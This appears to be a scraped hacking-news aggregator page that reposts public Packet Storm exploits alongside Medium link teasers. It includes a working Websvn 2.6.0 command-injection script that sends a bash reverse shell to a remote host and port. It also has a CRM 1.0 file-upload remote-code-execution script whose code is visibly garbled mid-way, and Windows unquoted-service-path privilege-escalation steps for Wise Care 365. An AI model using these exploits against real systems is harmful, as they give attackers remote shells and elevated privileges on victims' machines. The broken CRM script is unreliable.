Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Customer Relationship Management System 1.0 Remote Code Execution
https://3.bp.blogspot.com/-S_42fggy9lU/WWlvmFk_l6I/AAAAAAAAIRE/4fLLQglySPcuo1eoPxnOCfdodS4kW3PlwCLcBGAs/s1600/hack_img3.png
Customer Relationship Management System version 1.0 suffers from a remote code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Customer Relationship Management System 1.0 Remote Code Execution
https://3.bp.blogspot.com/-S_42fggy9lU/WWlvmFk_l6I/AAAAAAAAIRE/4fLLQglySPcuo1eoPxnOCfdodS4kW3PlwCLcBGAs/s1600/hack_img3.png
Customer Relationship Management System version 1.0 suffers from a remote code execution vulnerability.
MD5 |
99340adb5ad46f21eb2f6d0bdb63c633Download
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Date: 21.06.2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1.x
# Tested on: Ubuntu
# REQUREMENTS #
# run pip3 install requests colorama beautifulsoup4
# DESCRIPTION #
# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option
# # Exploit Working:
# # 1. Starting a session with the server
# # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag
# # 4. Runing the payload file to give a shell
#!/usr/bin/python3
import requests , time
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style
# Variables : change the URL according to need
URL="http://192.168.0.245/crm/" # CHANGE THIS
shellcode = ">> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Customer Relationship Management System 1.0 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Websvn 2.6.0 Remote Code Execution
https://3.bp.blogspot.com/-4JQvP0m8T2k/WWlu48OEwdI/AAAAAAAAII8/Zf-K1JUBYisUlMBEUhCPF3Gl3BdQ2zG_gCLcBGAs/s1600/h103.png
Websvn version 2.6.0 suffers from a remote code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Websvn 2.6.0 Remote Code Execution
https://3.bp.blogspot.com/-4JQvP0m8T2k/WWlu48OEwdI/AAAAAAAAII8/Zf-K1JUBYisUlMBEUhCPF3Gl3BdQ2zG_gCLcBGAs/s1600/h103.png
Websvn version 2.6.0 suffers from a remote code execution vulnerability.
MD5 |
6ae7383ff4fe81d3446640a77cf479dbDownload
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.target.startswith("https://"):
target = args.target
else:
print("[!] Target should start with either http:// or https://")
exit()
requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))
print("[*] Request send. Did you get what you wanted?")
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Websvn 2.6.0 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wise Care 365 5.6.7.568 Unquoted Service Path
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Wise Care 365 version 5.6.7.568 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Wise Care 365 5.6.7.568 Unquoted Service Path
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Wise Care 365 version 5.6.7.568 suffers from an unquoted service path vulnerability.
MD5 |
1e5c422e986035f8e0e5d6d5e68ecce2Download
# Exploit Title: Wise Care 365 5.6.7.568 - 'WiseBootAssistant' Unquoted Service Path
# Date: 2021-06-18
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.wisecleaner.com/wise-care-365.html
# Software Link: https://downloads.wisecleaner.com/soft/WiseCare365_5.6.7.568.exe
# Version: 5.6.7.568
# Service File Version 1.2.4.54
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%WiseBootAssistant%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
Wise Boot Assistant C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "WiseBootAssistant"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WiseBootAssistant
TIPO : 110 WIN32_OWN_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wise Boot Assistant
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Wise Care 365 5.6.7.568 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Hupigon.aaio Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Hupigon.aaio Buffer Overflow
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Hupigon.aaio Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hybrid Analyst Article of the Day: Comparing Ransomware to other Political Tools
https://cdn-images-1.medium.com/max/983/1*5KFT_a2BUzHP6rpJ2m7e3Q.jpeg
The Political Economy of Ransomware — Jenny Jun, War On The Rocks, 6/2/2021
Continue reading on Hybrid Analyst »
___________________________
@hacking_Attack
@Hacking_Video
Hybrid Analyst Article of the Day: Comparing Ransomware to other Political Tools
https://cdn-images-1.medium.com/max/983/1*5KFT_a2BUzHP6rpJ2m7e3Q.jpeg
The Political Economy of Ransomware — Jenny Jun, War On The Rocks, 6/2/2021
Continue reading on Hybrid Analyst »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hybrid Analyst Article of the Day: Comparing Ransomware to other Political Tools
The Political Economy of Ransomware — Jenny Jun, War On The Rocks, 6/2/2021
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hackers Share Their Stories on The Hacker Factory Podcast
I have had the honor of podcasting for ITSPMagazine since February 2020.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hackers Share Their Stories on The Hacker Factory Podcast
I have had the honor of podcasting for ITSPMagazine since February 2020.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hackers Share Their Stories on The Hacker Factory Podcast
I have had the honor of podcasting for ITSPMagazine since February 2020. My first podcast was The Uncommon Journey with two amazing friends…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Wormable DarkRadiation Ransomware se dirige a instancias de Linux y Docker
https://cdn-images-1.medium.com/max/905/0*es7kgy-douaZTdH4
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Wormable DarkRadiation Ransomware se dirige a instancias de Linux y Docker
https://cdn-images-1.medium.com/max/905/0*es7kgy-douaZTdH4
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Wormable DarkRadiation Ransomware se dirige a instancias de Linux y Docker
POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How Sean Parker went from teenage hacker to billionaire
https://cdn-images-1.medium.com/max/1200/0*rKD3slJzhNceeHpF
Sean Parker got his start as a teenage hacker before cofounding Napster in 1999.
Continue reading on Business Insider »
___________________________
@hacking_Attack
@Hacking_Video
How Sean Parker went from teenage hacker to billionaire
https://cdn-images-1.medium.com/max/1200/0*rKD3slJzhNceeHpF
Sean Parker got his start as a teenage hacker before cofounding Napster in 1999.
Continue reading on Business Insider »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How Sean Parker went from teenage hacker to billionaire
Sean Parker got his start as a teenage hacker before cofounding Napster in 1999.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: Retro — Walkthrough
https://cdn-images-1.medium.com/max/804/0*Pckc-0thi0_buu7u
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TryHackMe: Retro — Walkthrough
https://cdn-images-1.medium.com/max/804/0*Pckc-0thi0_buu7u
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TryHackMe: Retro — Walkthrough
Introduction